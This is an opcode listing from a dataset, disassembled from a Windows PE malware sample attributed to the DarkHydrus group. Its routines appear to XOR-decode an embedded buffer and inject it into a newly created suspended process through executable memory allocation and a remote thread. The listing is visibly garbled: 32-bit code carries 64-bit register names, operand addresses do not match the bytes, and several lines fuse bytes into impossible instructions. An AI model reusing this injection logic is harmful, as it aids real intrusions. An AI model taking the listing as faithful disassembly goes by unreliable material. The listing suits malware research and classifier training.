# Opcode extraction for malware analysis
# APT Group: 16-G0079-DarkHydrus-2
# Malware Hash: b2571e3b4afbce56da8faa726b726eb465f2e5e5ed74cf3b172b5dd80460ad81
# Executable format: Portable Executable (PE)
# Processor: x86
# Creation date: Mon Nov 04 01:32:34 EST 2024
# Format: <Address> | <Bytes> | <Mnemonic> | <Full Instruction>

6bac1040 | 56 | PUSH | PUSH RSI
6bac1041 | 53 | PUSH | PUSH RBX
6bac1042 | 83 ec 14 | SUB | SUB ESP,0x14
6bac1045 | 8b 54 24 24 | MOV | MOV EDX,dword ptr [RSP + 0x24]
6bac1049 | 85 d2 | TEST | TEST EDX,EDX
6bac104b | 75 79 | JNZ | JNZ 0x6bac10c6
6bac104d | 8b 15 00 50 ac 6b | MOV | MOV EDX,dword ptr [0xd7586053]
6bac1053 | 31 c0 | XOR | XOR EAX,EAX
6bac1055 | 85 d2 | TEST | TEST EDX,EDX
6bac1057 | 7e 65 | JLE | JLE 0x6bac10be
6bac1059 | 83 ea 01 | SUB | SUB EDX,0x1
6bac105c | 8b 1d 60 71 ac 6b | MOV | MOV EBX,dword ptr [0xd75881c2]
6bac1062 | 89 15 00 50 ac 6b | MOV | MOV dword ptr [0xd7586068],EDX
6bac1068 | eb 12 | JMP | JMP 0x6bac107c
6bac1070 | c7 04 24 e8 03 00 00 | MOV | MOV dword ptr [RSP],0x3e8
6bac1077 | ff d3 | CALL | CALL RBX
6bac1079 | 83 ec 04 | SUB | SUB ESP,0x4
6bac107c | c7 44 24 08 00 00 00 00 | MOV | MOV dword ptr [RSP + 0x8],0x0
6bac1084 | c7 44 24 04 01 00 00 00 | MOV | MOV dword ptr [RSP + 0x4],0x1
6bac108c | c7 04 24 b0 53 ac 6b | MOV | MOV dword ptr [RSP],0x6bac53b0
6bac1093 | e8 e8 17 00 00 | CALL | CALL 0x6bac2880
6bac1098 | 83 ec 0c | SUB | SUB ESP,0xc
6bac109b | 85 c0 | TEST | TEST EAX,EAX
6bac109d | 75 d1 | JNZ | JNZ 0x6bac1070
6bac109f | a1 b4 53 ac 6b 83 f8 02 0f | MOV | MOV EAX,[0xf02f8836bac53b4]
6bac10a8 | 84 d6 | TEST | TEST DH,DL
6bac10aa | 00 00 | ADD | ADD byte ptr [RAX],AL
6bac10ac | 00 c7 | ADD | ADD BH,AL
6bac10ae | 04 24 | ADD | ADD AL,0x24
6bac10be | 83 c4 14 | ADD | ADD ESP,0x14
6bac10c1 | 5b | POP | POP RBX
6bac10c2 | 5e | POP | POP RSI
6bac10c3 | c2 0c 00 | RET | RET 0xc
6bac10c6 | 83 fa 01 | CMP | CMP EDX,0x1
6bac10c9 | b8 01 00 00 00 | MOV | MOV EAX,0x1
6bac10ce | 75 ee | JNZ | JNZ 0x6bac10be
6bac10d0 | 64 a1 18 00 00 00 8b 35 60 71 | MOV | MOV EAX,FS:[0x7160358b00000018]
6bac10da | ac | LODSB | LODSB RSI
6bac10db | 6b 8b 58 04 eb 14 39 | IMUL | IMUL ECX,dword ptr [RBX + 0x14eb0458],0x39
6bac10e2 | d8 0f | FMUL | FMUL dword ptr [RDI]
6bac10e4 | 84 0e | TEST | TEST byte ptr [RSI],CL
6bac10e6 | 01 00 | ADD | ADD dword ptr [RAX],EAX
6bac10e8 | 00 c7 | ADD | ADD BH,AL
6bac10ea | 04 24 | ADD | ADD AL,0x24
6bac10ec | e8 03 00 00 ff | CALL | CALL 0x6aac10f4
6bac1260 | 83 ec 2c | SUB | SUB ESP,0x2c
6bac1263 | 85 d2 | TEST | TEST EDX,EDX
6bac1265 | 89 5c 24 1c | MOV | MOV dword ptr [RSP + 0x1c],EBX
6bac1269 | 89 c3 | MOV | MOV EBX,EAX
6bac126b | 89 74 24 20 | MOV | MOV dword ptr [RSP + 0x20],ESI
6bac126f | 89 d6 | MOV | MOV ESI,EDX
6bac1271 | 89 6c 24 28 | MOV | MOV dword ptr [RSP + 0x28],EBP
6bac1275 | 89 cd | MOV | MOV EBP,ECX
6bac1277 | 89 7c 24 24 | MOV | MOV dword ptr [RSP + 0x24],EDI
6bac127b | 89 15 04 34 ac 6b | MOV | MOV dword ptr [0xd7584685],EDX
6bac1281 | 0f 85 8d 00 00 00 | JNZ | JNZ 0x6bac1314
6bac1287 | a1 00 50 ac 6b 31 ff 85 c0 | MOV | MOV EAX,[0xc085ff316bac5000]
6bac1290 | 74 27 | JZ | JZ 0x6bac12b9
6bac1292 | e8 e9 0a 00 00 | CALL | CALL 0x6bac1d80
6bac1297 | 89 6c 24 08 | MOV | MOV dword ptr [RSP + 0x8],EBP
6bac129b | c7 44 24 04 00 00 00 00 | MOV | MOV dword ptr [RSP + 0x4],0x0
6bac12a3 | 89 1c 24 | MOV | MOV dword ptr [RSP],EBX
6bac12a6 | e8 84 02 00 00 | CALL | CALL 0x6bac152f
6bac12ab | 83 ec 0c | SUB | SUB ESP,0xc
6bac12ae | 89 c7 | MOV | MOV EDI,EAX
6bac12b0 | 83 fe 03 | CMP | CMP ESI,0x3
6bac12b3 | 74 2b | JZ | JZ 0x6bac12e0
6bac12b5 | 85 f6 | TEST | TEST ESI,ESI
6bac12b7 | 74 27 | JZ | JZ 0x6bac12e0
6bac12b9 | 89 f8 | MOV | MOV EAX,EDI
6bac12bb | 8b 5c 24 1c | MOV | MOV EBX,dword ptr [RSP + 0x1c]
6bac12bf | c7 05 04 34 ac 6b ff ff ff ff | MOV | MOV dword ptr [0xd75846cd],0xffffffff
6bac12c9 | 8b 74 24 20 | MOV | MOV ESI,dword ptr [RSP + 0x20]
6bac12cd | 8b 7c 24 24 | MOV | MOV EDI,dword ptr [RSP + 0x24]
6bac12d1 | 8b 6c 24 28 | MOV | MOV EBP,dword ptr [RSP + 0x28]
6bac12d5 | 83 c4 2c | ADD | ADD ESP,0x2c
6bac12d8 | c3 | RET | RET
6bac12e0 | 89 6c 24 08 | MOV | MOV dword ptr [RSP + 0x8],EBP
6bac12e4 | 89 74 24 04 | MOV | MOV dword ptr [RSP + 0x4],ESI
6bac12e8 | 89 1c 24 | MOV | MOV dword ptr [RSP],EBX
6bac12eb | e8 b0 15 00 00 | CALL | CALL 0x6bac28a0
6bac12f0 | 83 ec 0c | SUB | SUB ESP,0xc
6bac12f3 | 89 c7 | MOV | MOV EDI,EAX
6bac12f5 | 89 6c 24 08 | MOV | MOV dword ptr [RSP + 0x8],EBP
6bac12f9 | 89 74 24 04 | MOV | MOV dword ptr [RSP + 0x4],ESI
6bac12fd | 89 1c 24 | MOV | MOV dword ptr [RSP],EBX
6bac1300 | e8 3b fd ff ff | CALL | CALL 0x6bac1040
6bac1305 | 83 ec 0c | SUB | SUB ESP,0xc
6bac1308 | 85 c0 | TEST | TEST EAX,EAX
6bac130a | b8 00 00 00 00 | MOV | MOV EAX,0x0
6bac130f | 0f 44 f8 | CMOVZ | CMOVZ EDI,EAX
6bac1312 | eb a5 | JMP | JMP 0x6bac12b9
6bac1314 | e8 67 0a 00 00 | CALL | CALL 0x6bac1d80
6bac1319 | 8d 46 ff | LEA | LEA EAX,[RSI + -0x1]
6bac131c | 83 f8 01 | CMP | CMP EAX,0x1
6bac131f | 76 70 | JBE | JBE 0x6bac1391
6bac1321 | 89 6c 24 08 | MOV | MOV dword ptr [RSP + 0x8],EBP
6bac1325 | 89 74 24 04 | MOV | MOV dword ptr [RSP + 0x4],ESI
6bac1329 | 89 1c 24 | MOV | MOV dword ptr [RSP],EBX
6bac132c | e8 fe 01 00 00 | CALL | CALL 0x6bac152f
6bac1331 | 83 ec 0c | SUB | SUB ESP,0xc
6bac1334 | 85 c0 | TEST | TEST EAX,EAX
6bac1336 | 89 c7 | MOV | MOV EDI,EAX
6bac1338 | 0f 85 72 ff ff ff | JNZ | JNZ 0x6bac12b0
6bac133e | 83 fe 01 | CMP | CMP ESI,0x1
6bac1341 | 0f 85 69 ff ff ff | JNZ | JNZ 0x6bac12b0
6bac1347 | 89 6c 24 08 | MOV | MOV dword ptr [RSP + 0x8],EBP
6bac134b | c7 44 24 04 00 00 00 00 | MOV | MOV dword ptr [RSP + 0x4],0x0
6bac1353 | 89 1c 24 | MOV | MOV dword ptr [RSP],EBX
6bac1356 | e8 d4 01 00 00 | CALL | CALL 0x6bac152f
6bac135b | 83 ec 0c | SUB | SUB ESP,0xc
6bac135e | 89 6c 24 08 | MOV | MOV dword ptr [RSP + 0x8],EBP
6bac1362 | c7 44 24 04 00 00 00 00 | MOV | MOV dword ptr [RSP + 0x4],0x0
6bac136a | 89 1c 24 | MOV | MOV dword ptr [RSP],EBX
6bac136d | e8 2e 15 00 00 | CALL | CALL 0x6bac28a0
6bac1372 | 83 ec 0c | SUB | SUB ESP,0xc
6bac1375 | 89 6c 24 08 | MOV | MOV dword ptr [RSP + 0x8],EBP
6bac1379 | c7 44 24 04 00 00 00 00 | MOV | MOV dword ptr [RSP + 0x4],0x0
6bac1381 | 89 1c 24 | MOV | MOV dword ptr [RSP],EBX
6bac1384 | e8 b7 fc ff ff | CALL | CALL 0x6bac1040
6bac1389 | 83 ec 0c | SUB | SUB ESP,0xc
6bac138c | e9 1f ff ff ff | JMP | JMP 0x6bac12b0
6bac1391 | 89 6c 24 08 | MOV | MOV dword ptr [RSP + 0x8],EBP
6bac1395 | 89 74 24 04 | MOV | MOV dword ptr [RSP + 0x4],ESI
6bac1399 | 89 1c 24 | MOV | MOV dword ptr [RSP],EBX
6bac139c | e8 9f fc ff ff | CALL | CALL 0x6bac1040
6bac13a1 | 83 ec 0c | SUB | SUB ESP,0xc
6bac13a4 | 85 c0 | TEST | TEST EAX,EAX
6bac13a6 | 89 c7 | MOV | MOV EDI,EAX
6bac13a8 | 0f 84 0b ff ff ff | JZ | JZ 0x6bac12b9
6bac13ae | 89 6c 24 08 | MOV | MOV dword ptr [RSP + 0x8],EBP
6bac13b2 | 89 74 24 04 | MOV | MOV dword ptr [RSP + 0x4],ESI
6bac13b6 | 89 1c 24 | MOV | MOV dword ptr [RSP],EBX
6bac13b9 | e8 e2 14 00 00 | CALL | CALL 0x6bac28a0
6bac13be | 83 ec 0c | SUB | SUB ESP,0xc
6bac13c1 | 85 c0 | TEST | TEST EAX,EAX
6bac13c3 | 89 c7 | MOV | MOV EDI,EAX
6bac13c5 | 75 29 | JNZ | JNZ 0x6bac13f0
6bac13c7 | 83 fe 01 | CMP | CMP ESI,0x1
6bac13ca | 0f 85 e9 fe ff ff | JNZ | JNZ 0x6bac12b9
6bac13d0 | 89 6c 24 08 | MOV | MOV dword ptr [RSP + 0x8],EBP
6bac13d4 | c7 44 24 04 00 00 00 00 | MOV | MOV dword ptr [RSP + 0x4],0x0
6bac13dc | 89 1c 24 | MOV | MOV dword ptr [RSP],EBX
6bac13df | e8 5c fc ff ff | CALL | CALL 0x6bac1040
6bac13e4 | 83 ec 0c | SUB | SUB ESP,0xc
6bac13e7 | e9 cd fe ff ff | JMP | JMP 0x6bac12b9
6bac13f0 | 83 fe 01 | CMP | CMP ESI,0x1
6bac13f3 | 75 0a | JNZ | JNZ 0x6bac13ff
6bac13f5 | e8 b6 0c 00 00 | CALL | CALL 0x6bac20b0
6bac13fa | e9 22 ff ff ff | JMP | JMP 0x6bac1321
6bac13ff | 89 6c 24 08 | MOV | MOV dword ptr [RSP + 0x8],EBP
6bac1403 | c7 44 24 04 02 00 00 00 | MOV | MOV dword ptr [RSP + 0x4],0x2
6bac140b | 89 1c 24 | MOV | MOV dword ptr [RSP],EBX
6bac140e | e8 1c 01 00 00 | CALL | CALL 0x6bac152f
6bac1413 | 83 ec 0c | SUB | SUB ESP,0xc
6bac1416 | 89 c7 | MOV | MOV EDI,EAX
6bac1418 | e9 93 fe ff ff | JMP | JMP 0x6bac12b0
6bac1420 | 83 ec 1c | SUB | SUB ESP,0x1c
6bac1423 | 8b 54 24 24 | MOV | MOV EDX,dword ptr [RSP + 0x24]
6bac1427 | c7 05 18 50 ac 6b 00 00 00 00 | MOV | MOV dword ptr [0xd7586449],0x0
6bac1431 | 83 fa 01 | CMP | CMP EDX,0x1
6bac1434 | 74 1a | JZ | JZ 0x6bac1450
6bac1436 | 8b 4c 24 28 | MOV | MOV ECX,dword ptr [RSP + 0x28]
6bac143a | 8b 44 24 20 | MOV | MOV EAX,dword ptr [RSP + 0x20]
6bac143e | e8 1d fe ff ff | CALL | CALL 0x6bac1260
6bac1443 | 83 c4 1c | ADD | ADD ESP,0x1c
6bac1446 | c2 0c 00 | RET | RET 0xc
6bac1450 | 89 54 24 0c | MOV | MOV dword ptr [RSP + 0xc],EDX
6bac1454 | e8 77 0c 00 00 | CALL | CALL 0x6bac20d0
6bac1459 | 8b 54 24 0c | MOV | MOV EDX,dword ptr [RSP + 0xc]
6bac145d | eb d7 | JMP | JMP 0x6bac1436
6bac14c0 | 55 | PUSH | PUSH RBP
6bac14c1 | 89 e5 | MOV | MOV EBP,ESP
6bac14c3 | 57 | PUSH | PUSH RDI
6bac14c4 | 56 | PUSH | PUSH RSI
6bac14c5 | be 10 30 ac 6b | MOV | MOV ESI,0x6bac3010
6bac14ca | 53 | PUSH | PUSH RBX
6bac14cb | 83 ec 2c | SUB | SUB ESP,0x2c
6bac14ce | 8b 15 04 30 ac 6b | MOV | MOV EDX,dword ptr [0xd75844d8]
6bac14d4 | 89 14 24 | MOV | MOV dword ptr [RSP],EDX
6bac14d7 | 89 55 e4 | MOV | MOV dword ptr [RBP + -0x1c],EDX
6bac14da | e8 d1 13 00 00 | CALL | CALL 0x6bac28b0
6bac14df | 8b 55 e4 | MOV | MOV EDX,dword ptr [RBP + -0x1c]
6bac14e2 | 89 d1 | MOV | MOV ECX,EDX
6bac14e4 | 89 c7 | MOV | MOV EDI,EAX
6bac14e6 | 89 c3 | MOV | MOV EBX,EAX
6bac14e8 | f3 a4 | MOVSB.REP | MOVSB.REP RDI,RSI
6bac14ea | c7 44 24 08 08 30 ac 6b | MOV | MOV dword ptr [RSP + 0x8],0x6bac3008
6bac14f2 | 89 54 24 04 | MOV | MOV dword ptr [RSP + 0x4],EDX
6bac14f6 | 89 04 24 | MOV | MOV dword ptr [RSP],EAX
6bac14f9 | e8 ab 02 00 00 | CALL | CALL 0x6bac17a9
6bac14fe | 89 5d 08 | MOV | MOV dword ptr [RBP + 0x8],EBX
6bac1501 | 83 c4 2c | ADD | ADD ESP,0x2c
6bac1504 | 5b | POP | POP RBX
6bac1505 | 5e | POP | POP RSI
6bac1506 | 5f | POP | POP RDI
6bac1507 | 5d | POP | POP RBP
6bac1508 | e9 b3 13 00 00 | JMP | JMP 0x6bac28c0
6bac1510 | 55 | PUSH | PUSH RBP
6bac1511 | 89 e5 | MOV | MOV EBP,ESP
6bac1513 | 83 ec 18 | SUB | SUB ESP,0x18
6bac1516 | 8b 45 08 | MOV | MOV EAX,dword ptr [RBP + 0x8]
6bac1519 | 8b 00 | MOV | MOV EAX,dword ptr [RAX]
6bac151b | 89 04 24 | MOV | MOV dword ptr [RSP],EAX
6bac151e | e8 9d ff ff ff | CALL | CALL 0x6bac14c0
6bac1523 | c7 04 24 00 00 00 00 | MOV | MOV dword ptr [RSP],0x0
6bac152a | e8 a1 13 00 00 | CALL | CALL 0x6bac28d0
6bac152f | 55 | PUSH | PUSH RBP
6bac1530 | 89 e5 | MOV | MOV EBP,ESP
6bac1532 | 57 | PUSH | PUSH RDI
6bac1533 | 81 ec c4 00 00 00 | SUB | SUB ESP,0xc4
6bac1539 | 83 7d 0c 01 | CMP | CMP dword ptr [RBP + 0xc],0x1
6bac153d | 75 70 | JNZ | JNZ 0x6bac15af
6bac153f | 8d 95 64 ff ff ff | LEA | LEA EDX,[RBP + -0x9c]
6bac1545 | 31 c0 | XOR | XOR EAX,EAX
6bac1547 | 89 d7 | MOV | MOV EDI,EDX
6bac1549 | b9 25 00 00 00 | MOV | MOV ECX,0x25
6bac154e | f3 ab | STOSD.REP | STOSD.REP RDI
6bac1550 | c7 85 64 ff ff ff 94 00 00 00 | MOV | MOV dword ptr [RBP + -0x9c],0x94
6bac155a | 89 14 24 | MOV | MOV dword ptr [RSP],EDX
6bac155d | ff 15 44 71 ac 6b | CALL | CALL qword ptr [0xd75886a7]
6bac1563 | 83 bd 68 ff ff ff 09 | CMP | CMP dword ptr [RBP + -0x98],0x9
6bac156a | 50 | PUSH | PUSH RAX
6bac156b | 76 0b | JBE | JBE 0x6bac1578
6bac156d | 8d 45 08 | LEA | LEA EAX,[RBP + 0x8]
6bac1570 | 89 04 24 | MOV | MOV dword ptr [RSP],EAX
6bac1573 | e8 98 ff ff ff | CALL | CALL 0x6bac1510
6bac1578 | 8d 45 08 | LEA | LEA EAX,[RBP + 0x8]
6bac157b | c7 44 24 14 00 00 00 00 | MOV | MOV dword ptr [RSP + 0x14],0x0
6bac1583 | c7 44 24 10 00 00 00 00 | MOV | MOV dword ptr [RSP + 0x10],0x0
6bac158b | 89 44 24 0c | MOV | MOV dword ptr [RSP + 0xc],EAX
6bac158f | c7 44 24 08 10 15 ac 6b | MOV | MOV dword ptr [RSP + 0x8],0x6bac1510
6bac1597 | c7 44 24 04 00 00 00 00 | MOV | MOV dword ptr [RSP + 0x4],0x0
6bac159f | c7 04 24 00 00 00 00 | MOV | MOV dword ptr [RSP],0x0
6bac15a6 | ff 15 10 71 ac 6b | CALL | CALL qword ptr [0xd75886bc]
6bac15ac | 83 ec 18 | SUB | SUB ESP,0x18
6bac15af | b8 01 00 00 00 | MOV | MOV EAX,0x1
6bac15b4 | 8b 7d fc | MOV | MOV EDI,dword ptr [RBP + -0x4]
6bac15b7 | c9 | LEAVE | LEAVE
6bac15b8 | c2 0c 00 | RET | RET 0xc
6bac15bb | 55 | PUSH | PUSH RBP
6bac15bc | 31 c0 | XOR | XOR EAX,EAX
6bac15be | 89 e5 | MOV | MOV EBP,ESP
6bac15c0 | 5d | POP | POP RBP
6bac15c1 | c3 | RET | RET
6bac15c2 | 55 | PUSH | PUSH RBP
6bac15c3 | 31 c0 | XOR | XOR EAX,EAX
6bac15c5 | 89 e5 | MOV | MOV EBP,ESP
6bac15c7 | 5d | POP | POP RBP
6bac15c8 | c3 | RET | RET
6bac15c9 | 55 | PUSH | PUSH RBP
6bac15ca | b8 11 01 04 80 | MOV | MOV EAX,0x80040111
6bac15cf | 89 e5 | MOV | MOV EBP,ESP
6bac15d1 | 5d | POP | POP RBP
6bac15d2 | c2 0c 00 | RET | RET 0xc
6bac15de | 55 | PUSH | PUSH RBP
6bac15df | 89 e5 | MOV | MOV EBP,ESP
6bac15e1 | 53 | PUSH | PUSH RBX
6bac15e2 | 83 ec 14 | SUB | SUB ESP,0x14
6bac15e5 | 8b 1d 60 71 ac 6b | MOV | MOV EBX,dword ptr [0xd758874b]
6bac15eb | c7 04 24 60 ea 00 00 | MOV | MOV dword ptr [RSP],0xea60
6bac15f2 | ff d3 | CALL | CALL RBX
6bac15f4 | 52 | PUSH | PUSH RDX
6bac15f5 | eb f4 | JMP | JMP 0x6bac15eb
6bac15f8 | 55 | PUSH | PUSH RBP
6bac15f9 | 89 e5 | MOV | MOV EBP,ESP
6bac15fb | 57 | PUSH | PUSH RDI
6bac15fc | 56 | PUSH | PUSH RSI
6bac15fd | 53 | PUSH | PUSH RBX
6bac15fe | 83 ec 3c | SUB | SUB ESP,0x3c
6bac1601 | 8b 75 10 | MOV | MOV ESI,dword ptr [RBP + 0x10]
6bac1604 | 8b 5d 08 | MOV | MOV EBX,dword ptr [RBP + 0x8]
6bac1607 | c7 44 24 10 40 00 00 00 | MOV | MOV dword ptr [RSP + 0x10],0x40
6bac160f | c7 44 24 0c 00 10 00 00 | MOV | MOV dword ptr [RSP + 0xc],0x1000
6bac1617 | 8d 86 80 00 00 00 | LEA | LEA EAX,[RSI + 0x80]
6bac161d | 89 44 24 08 | MOV | MOV dword ptr [RSP + 0x8],EAX
6bac1621 | c7 44 24 04 00 00 00 00 | MOV | MOV dword ptr [RSP + 0x4],0x0
6bac1629 | 89 1c 24 | MOV | MOV dword ptr [RSP],EBX
6bac162c | ff 15 70 71 ac 6b | CALL | CALL qword ptr [0xd75887a2]
6bac1632 | 83 ec 14 | SUB | SUB ESP,0x14
6bac1635 | 89 c7 | MOV | MOV EDI,EAX
6bac1637 | 8d 45 e4 | LEA | LEA EAX,[RBP + -0x1c]
6bac163a | 89 44 24 10 | MOV | MOV dword ptr [RSP + 0x10],EAX
6bac163e | 8b 45 0c | MOV | MOV EAX,dword ptr [RBP + 0xc]
6bac1641 | 89 74 24 0c | MOV | MOV dword ptr [RSP + 0xc],ESI
6bac1645 | 89 7c 24 04 | MOV | MOV dword ptr [RSP + 0x4],EDI
6bac1649 | 89 1c 24 | MOV | MOV dword ptr [RSP],EBX
6bac164c | 89 44 24 08 | MOV | MOV dword ptr [RSP + 0x8],EAX
6bac1650 | ff 15 7c 71 ac 6b | CALL | CALL qword ptr [0xd75887d2]
6bac1656 | 83 ec 14 | SUB | SUB ESP,0x14
6bac1659 | 39 75 e4 | CMP | CMP dword ptr [RBP + -0x1c],ESI
6bac165c | 75 38 | JNZ | JNZ 0x6bac1696
6bac165e | c7 44 24 18 00 00 00 00 | MOV | MOV dword ptr [RSP + 0x18],0x0
6bac1666 | c7 44 24 14 00 00 00 00 | MOV | MOV dword ptr [RSP + 0x14],0x0
6bac166e | c7 44 24 10 00 00 00 00 | MOV | MOV dword ptr [RSP + 0x10],0x0
6bac1676 | 89 7c 24 0c | MOV | MOV dword ptr [RSP + 0xc],EDI
6bac167a | c7 44 24 08 00 00 00 00 | MOV | MOV dword ptr [RSP + 0x8],0x0
6bac1682 | c7 44 24 04 00 00 00 00 | MOV | MOV dword ptr [RSP + 0x4],0x0
6bac168a | 89 1c 24 | MOV | MOV dword ptr [RSP],EBX
6bac168d | ff 15 0c 71 ac 6b | CALL | CALL qword ptr [0xd758879f]
6bac1693 | 83 ec 1c | SUB | SUB ESP,0x1c
6bac1696 | 8d 65 f4 | LEA | LEA ESP,[RBP + -0xc]
6bac1699 | 5b | POP | POP RBX
6bac169a | 5e | POP | POP RSI
6bac169b | 5f | POP | POP RDI
6bac169c | 5d | POP | POP RBP
6bac169d | c3 | RET | RET
6bac169e | 55 | PUSH | PUSH RBP
6bac169f | 89 e5 | MOV | MOV EBP,ESP
6bac16a1 | 57 | PUSH | PUSH RDI
6bac16a2 | 56 | PUSH | PUSH RSI
6bac16a3 | 53 | PUSH | PUSH RBX
6bac16a4 | 81 ec ac 08 00 00 | SUB | SUB ESP,0x8ac
6bac16aa | 8b 75 10 | MOV | MOV ESI,dword ptr [RBP + 0x10]
6bac16ad | 85 f6 | TEST | TEST ESI,ESI
6bac16af | 74 05 | JZ | JZ 0x6bac16b6
6bac16b1 | 80 3e 00 | CMP | CMP byte ptr [RSI],0x0
6bac16b4 | 75 0b | JNZ | JNZ 0x6bac16c1
6bac16b6 | ff 15 20 71 ac 6b | CALL | CALL qword ptr [0xd75887dc]
6bac16bc | e9 c6 00 00 00 | JMP | JMP 0x6bac1787
6bac16c1 | 8d 55 94 | LEA | LEA EDX,[RBP + -0x6c]
6bac16c4 | 31 c0 | XOR | XOR EAX,EAX
6bac16c6 | 89 d7 | MOV | MOV EDI,EDX
6bac16c8 | b9 11 00 00 00 | MOV | MOV ECX,0x11
6bac16cd | f3 ab | STOSD.REP | STOSD.REP RDI
6bac16cf | 8d 5d d8 | LEA | LEA EBX,[RBP + -0x28]
6bac16d2 | 89 df | MOV | MOV EDI,EBX
6bac16d4 | c7 45 94 44 00 00 00 | MOV | MOV dword ptr [RBP + -0x6c],0x44
6bac16db | b1 04 | MOV | MOV CL,0x4
6bac16dd | f3 ab | STOSD.REP | STOSD.REP RDI
6bac16df | 8d bd 94 f7 ff ff | LEA | LEA EDI,[RBP + -0x86c]
6bac16e5 | 89 95 84 f7 ff ff | MOV | MOV dword ptr [RBP + -0x87c],EDX
6bac16eb | c7 44 24 08 00 04 00 00 | MOV | MOV dword ptr [RSP + 0x8],0x400
6bac16f3 | 89 7c 24 04 | MOV | MOV dword ptr [RSP + 0x4],EDI
6bac16f7 | c7 04 24 24 40 ac 6b | MOV | MOV dword ptr [RSP],0x6bac4024
6bac16fe | ff 15 2c 71 ac 6b | CALL | CALL qword ptr [0xd7588830]
6bac1704 | 83 ec 0c | SUB | SUB ESP,0xc
6bac1707 | 89 74 24 10 | MOV | MOV dword ptr [RSP + 0x10],ESI
6bac170b | 8d b5 94 fb ff ff | LEA | LEA ESI,[RBP + -0x46c]
6bac1711 | 89 7c 24 0c | MOV | MOV dword ptr [RSP + 0xc],EDI
6bac1715 | c7 44 24 08 2b 40 ac 6b | MOV | MOV dword ptr [RSP + 0x8],0x6bac402b
6bac171d | c7 44 24 04 00 04 00 00 | MOV | MOV dword ptr [RSP + 0x4],0x400
6bac1725 | 89 34 24 | MOV | MOV dword ptr [RSP],ESI
6bac1728 | ff 15 9c 71 ac 6b | CALL | CALL qword ptr [0xd75888ca]
6bac172e | 8b 95 84 f7 ff ff | MOV | MOV EDX,dword ptr [RBP + -0x87c]
6bac1734 | 89 5c 24 24 | MOV | MOV dword ptr [RSP + 0x24],EBX
6bac1738 | c7 44 24 1c 00 00 00 00 | MOV | MOV dword ptr [RSP + 0x1c],0x0
6bac1740 | c7 44 24 18 00 00 00 00 | MOV | MOV dword ptr [RSP + 0x18],0x0
6bac1748 | 89 54 24 20 | MOV | MOV dword ptr [RSP + 0x20],EDX
6bac174c | c7 44 24 14 04 00 00 00 | MOV | MOV dword ptr [RSP + 0x14],0x4
6bac1754 | c7 44 24 10 01 00 00 00 | MOV | MOV dword ptr [RSP + 0x10],0x1
6bac175c | c7 44 24 0c 00 00 00 00 | MOV | MOV dword ptr [RSP + 0xc],0x0
6bac1764 | c7 44 24 08 00 00 00 00 | MOV | MOV dword ptr [RSP + 0x8],0x0
6bac176c | 89 74 24 04 | MOV | MOV dword ptr [RSP + 0x4],ESI
6bac1770 | c7 04 24 00 00 00 00 | MOV | MOV dword ptr [RSP],0x0
6bac1777 | ff 15 08 71 ac 6b | CALL | CALL qword ptr [0xd7588885]
6bac177d | 83 ec 28 | SUB | SUB ESP,0x28
6bac1780 | 85 c0 | TEST | TEST EAX,EAX
6bac1782 | 74 1d | JZ | JZ 0x6bac17a1
6bac1784 | 8b 45 d8 | MOV | MOV EAX,dword ptr [RBP + -0x28]
6bac1787 | 85 c0 | TEST | TEST EAX,EAX
6bac1789 | 74 16 | JZ | JZ 0x6bac17a1
6bac178b | 8b 55 0c | MOV | MOV EDX,dword ptr [RBP + 0xc]
6bac178e | 89 04 24 | MOV | MOV dword ptr [RSP],EAX
6bac1791 | 89 54 24 08 | MOV | MOV dword ptr [RSP + 0x8],EDX
6bac1795 | 8b 55 08 | MOV | MOV EDX,dword ptr [RBP + 0x8]
6bac1798 | 89 54 24 04 | MOV | MOV dword ptr [RSP + 0x4],EDX
6bac179c | e8 57 fe ff ff | CALL | CALL 0x6bac15f8
6bac17a1 | 8d 65 f4 | LEA | LEA ESP,[RBP + -0xc]
6bac17a4 | 5b | POP | POP RBX
6bac17a5 | 5e | POP | POP RSI
6bac17a6 | 5f | POP | POP RDI
6bac17a7 | 5d | POP | POP RBP
6bac17a8 | c3 | RET | RET
6bac17a9 | 55 | PUSH | PUSH RBP
6bac17aa | 31 c9 | XOR | XOR ECX,ECX
6bac17ac | 89 e5 | MOV | MOV EBP,ESP
6bac17ae | 57 | PUSH | PUSH RDI
6bac17af | 56 | PUSH | PUSH RSI
6bac17b0 | 53 | PUSH | PUSH RBX
6bac17b1 | 83 ec 1c | SUB | SUB ESP,0x1c
6bac17b4 | 8b 7d 10 | MOV | MOV EDI,dword ptr [RBP + 0x10]
6bac17b7 | 8b 5d 08 | MOV | MOV EBX,dword ptr [RBP + 0x8]
6bac17ba | 8b 75 0c | MOV | MOV ESI,dword ptr [RBP + 0xc]
6bac17bd | 89 7d e0 | MOV | MOV dword ptr [RBP + -0x20],EDI
6bac17c0 | eb 14 | JMP | JMP 0x6bac17d6
6bac17c2 | 89 c8 | MOV | MOV EAX,ECX
6bac17c4 | bf 04 00 00 00 | MOV | MOV EDI,0x4
6bac17c9 | 99 | CDQ | CDQ
6bac17ca | f7 ff | IDIV | IDIV EDI
6bac17cc | 8b 7d e0 | MOV | MOV EDI,dword ptr [RBP + -0x20]
6bac17cf | 8a 04 17 | MOV | MOV AL,byte ptr [RDI + RDX*0x1]
6bac17d2 | 30 04 0b | XOR | XOR byte ptr [RBX + RCX*0x1],AL
6bac17d6 | 39 f1 | CMP | CMP ECX,ESI
6bac17d8 | 7c e8 | JL | JL 0x6bac17c2
6bac17da | 89 75 0c | MOV | MOV dword ptr [RBP + 0xc],ESI
6bac17dd | 89 5d 08 | MOV | MOV dword ptr [RBP + 0x8],EBX
6bac17e0 | c7 45 10 3a 40 ac 6b | MOV | MOV dword ptr [RBP + 0x10],0x6bac403a
6bac17e7 | 83 c4 1c | ADD | ADD ESP,0x1c
6bac17ea | 5b | POP | POP RBX
6bac17eb | 5e | POP | POP RSI
6bac17ec | 5f | POP | POP RDI
6bac17ed | 5d | POP | POP RBP
6bac17ee | e9 ab fe ff ff | JMP | JMP 0x6bac169e
6bac1800 | 53 | PUSH | PUSH RBX
6bac1801 | 83 ec 28 | SUB | SUB ESP,0x28
6bac1804 | a1 ac 53 ac 6b 8b 5c 24 30 | MOV | MOV EAX,[0x30245c8b6bac53ac]
6bac180d | 89 04 24 | MOV | MOV dword ptr [RSP],EAX
6bac1810 | e8 ab 02 00 00 | CALL | CALL 0x6bac1ac0
6bac1815 | 83 f8 ff | CMP | CMP EAX,-0x1
6bac1818 | 89 44 24 18 | MOV | MOV dword ptr [RSP + 0x18],EAX
6bac181c | 0f 84 7e 00 00 00 | JZ | JZ 0x6bac18a0
